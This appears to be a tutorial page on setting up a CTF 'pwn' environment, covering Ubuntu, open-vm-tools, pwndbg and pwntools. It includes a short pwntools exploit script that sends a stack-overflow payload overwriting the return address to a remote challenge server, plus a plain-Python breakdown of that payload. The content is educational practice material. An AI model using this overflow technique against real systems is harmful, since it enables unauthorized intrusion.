To do a job well, one must first sharpen one's tools. Whatever branch of security you work in, you have a tool environment you use all the time, and PWN is no different: a well-set-up environment saves a lot of effort and keeps you from getting stuck at the critical moment because of something external. Open a path through the mountains, bridge the rivers, and become a badass pwn player.
Choosing a system
The system is Ubuntu, no question. Download it straight from the official site and pick a version from the last few years, nothing too old:
VMware Tools
When you install a virtual machine, VMware Tools is a must, but the closed-source version bundled with VMware is awkward to install, and the official documentation says as much:
So we install Open-VM-Tools instead:
Commands:
sudo apt install open-vm-tools
sudo apt install open-vm-tools-desktop
Then reboot. At the login screen choose Xorg, because Wayland has no clipboard sync or file drag-and-drop. You can now interact with the host:
pwndbg
pwndbg is a gdb plugin built specifically for debugging pwn challenges. It adds the following commands:
Command
arena
bins
heapbase
heapinfo
parseheap
tracemalloc
cyclic
rebase
stack
retaddr
canary
got
plt
hexdump
Installation commands:
apt install git
git clone https://github.com/pwndbg/pwndbg
Then enter the pwndbg directory and run setup.sh to start the installation:
After installation, type gdb in a terminal; if the prompt shows pwndbg, the installation succeeded:
pwntools
pwntools is a Python library commonly used for writing exploit scripts. Install it with:
apt install python3-pip
pip install pwntools
Usage example:
from pwn import *
# Connect to the challenge service
io = remote('61.147.171.105', 63315)
# Address to return to
bin_sh = 0x400762
# 0xA8 bytes of padding up to the saved return address, then the packed address
My_payload = b'a' * 0xA8 + p64(bin_sh)
# sendline() appends a newline after the payload
io.sendline(My_payload)
# Hand the connection over to the user
io.interactive()
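As an added example (not from the original post), here is a plain-Python reconstruction, using only the standard library, of what the p64 call and the payload layout in the script above do, so it runs without pwntools; the padding and address values are the ones from that script, and the 32-bit variant and the newline check are additions.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes (pwntools' p64 default)."""
    return struct.pack("<Q", value)


def p32(value: int) -> bytes:
    """Pack an integer as 4 little-endian bytes (pwntools' p32 default)."""
    return struct.pack("<I", value)


def build_payload(padding: int, target: int, bits: int = 64) -> bytes:
    """Padding bytes followed by the packed target, as in the script above."""
    pack = p64 if bits == 64 else p32
    return b"a" * padding + pack(target)


def inspect_payload(payload: bytes, padding: int, bits: int = 64) -> dict:
    """Split a payload back into its parts and flag bytes that break line reads."""
    width = bits // 8
    fmt = "<Q" if bits == 64 else "<I"
    addr_bytes = payload[padding:padding + width]
    return {
        "length": len(payload),
        "address": struct.unpack(fmt, addr_bytes)[0],
        # sendline() appends '\n'; a 0x0a byte inside the payload would end a
        # line-based read on the other side before the whole payload arrives.
        "contains_newline": b"\n" in payload,
    }


# Values taken from the page's example script
BIN_SH = 0x400762
PADDING = 0xA8

if __name__ == "__main__":
    payload = build_payload(PADDING, BIN_SH)
    print(payload[-8:].hex())          # 6207400000000000
    print(inspect_payload(payload, PADDING))
```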
Visual Studio Code
For writing scripts, Visual Studio Code is recommended. Install it directly from the store, then search the extensions for "chinese" to switch the UI to Chinese: